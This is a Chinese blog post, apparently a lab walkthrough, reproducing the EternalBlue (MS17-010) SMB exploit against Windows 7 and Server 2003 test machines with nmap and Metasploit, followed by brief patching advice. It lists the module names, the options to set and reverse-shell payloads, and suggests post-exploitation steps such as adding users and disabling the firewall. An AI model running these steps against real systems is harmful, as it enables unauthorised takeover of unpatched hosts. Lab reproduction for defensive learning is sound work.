一、永恒之蓝简述:

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。

二、SMB服务简述:

SMB(全称是Server Message Block)是一个协议名,它能被用于Web连接和客户端与服务器之间的信息沟通,端口:445。SMB最初是IBM的贝瑞·费根鲍姆(Barry Feigenbaum)研制的,其目的是将DOS操作系统中的本地文件接口“中断13”改造为网络文件系统

三、实验环境:

本次攻击机器:kali linux,ip:192.168.3.110

靶机两台:

windows server 2003,ip:192.168.3.48

windows7,ip:192.168.3.65

四、复现【命令我都标红了】:

首先攻击windows7,靶机的window7版本为旗舰版

1.在kaili上使用nmap探测win7的端口信息:nmap 192.168.3.65,可以看到该机器已开启445端口,当然也可以查看该445端口的banner信息,命令 nmap -sV -p445 192.168.3.65【查看下面图二】

     

2.使用kali自带的metasploit,如果是初次使用,先输入msfconsole进入msf,然后键入search ms17_010,查询对应的模块

3.可以先探测一下该系统是否存在永恒之蓝漏洞,当然也可以批量扫描C段,上面有五个模块可以选择,扫描的话使用 auxiliary/scanner/smb/smb_ms17_010,因为里面包含了scanner,键入命令 use auxiliary/scanner/smb/smb_ms17_010

查询该模块需要的参数,命令 show options,可以看到主要的参数是攻击的主机RHOSTS,设置参数:set rhosts 192.168.3.65【不分大小写】,再键入show options 即可查看是否成功赋值上,如果写错了可以选择unset rhosts来取消重新选择

4.使用 run 或者 exploit 命令即可成功查询,可以看到,Host is likely VULNERABLE to MS17-010!【主机可能容易受到MS17-010的攻击!】,证明可能存在永恒之蓝漏洞,下面开始利用

5.漏洞利用,回到刚才的ms17_010模块,win7需要使用exploit/windows/smb/ms17_010_eternalblue,windows2003使用exploit/windows/smb/ms17_010_psexec,win8那个没试过。。

所以我直接use exploit/windows/smb/ms17_010_eternalblue

6.同样需要show options来查看需要设置的参数,set rhost 192.168.3.65run 即可,按多两下回车就可以了,【从第一行可以看到,kali本地监听的端口为4444】

 7.键入命令即可,whoami 为system命令,查看 ipconfig 确实是192.168.3.65的ip地址

 

打开靶机windows7,输入命令netstat -an 查看,确实本地的64392端口被192.168.3.110:4444监听,反弹shell成功,接下来可以做一些使用kali建立的shell进行添加用户,关闭防火墙,远程3389连接图形化界面了等等。

至此漏洞复现完毕

8.windows2003的话回到第五步,步骤是一样的

永恒之蓝利用一般有三个结果:

①成功反弹shell,如上述实验,成功!

②被攻击的机器蓝屏,或者死机

③tightvnc,出现图形化界面且无法动弹,反弹失败【这种在选择了其他不同的payloads导致的,可以查看show payloads,我当初就选了windows/x64/meterpreter/reverse_tcp利用失败,本次实验没有选择指定的payload,直接利用最原始的】

后来选择了第三个通用的pyload【generic/shell_reverse_tcp】发现也可以,大家都可以去尝试一下其他的。

 五、漏洞修复:

微软已于2017 年 发布MS17-010补丁,修复了“永恒之蓝”攻击的系统漏洞,一定要及时更新Windows系统补丁;务必不要轻易打开doc、rtf等后缀的附件;

内网中存在使用相同账号、密码情况的机器请尽快修改密码,未开机的电脑请确认口令修改完毕、补丁安装完成后再进行联网操作,可以下载“永恒之蓝”漏洞修复工具进行漏洞修复。

内容来源于网络如有侵权请私信删除

文章来源: 博客园

原文链接: https://www.cnblogs.com/pandana/p/15191880.html

你还没有登录,请先登录注册
  • 还没有人评论,欢迎说说您的想法!